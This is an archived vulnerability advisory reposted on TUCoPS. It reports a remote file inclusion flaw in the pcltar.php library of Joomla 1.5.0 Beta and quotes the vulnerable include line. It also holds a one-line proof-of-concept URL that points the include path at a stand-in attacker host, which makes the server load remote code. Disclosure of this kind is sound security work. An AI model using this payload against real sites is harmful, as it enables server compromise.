Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: tb10567.htm

Joomla 1.5.0 Beta remote file include



Remote file inclusion in Joomla 1.5.0 Beta
Remote file inclusion in Joomla 1.5.0 Beta



Hi,
Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`
or `production` sites."
Joomla 1.0.12 has a good security but it seems that Joomla 1.5.0 doesnt
have a good security approach. Anyway, there is a remote file inclusion
in Joomla 1.5.0 Beta :

File /libraries/pcl/pcltar.php, Line 74 :
  if (!defined("PCLERROR_LIB"))
  {
	include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
  }

POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/? 

The original advisory (in Persian) is located at :
http://www.hackers.ir/advisories/joomla.html 


- Omid


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH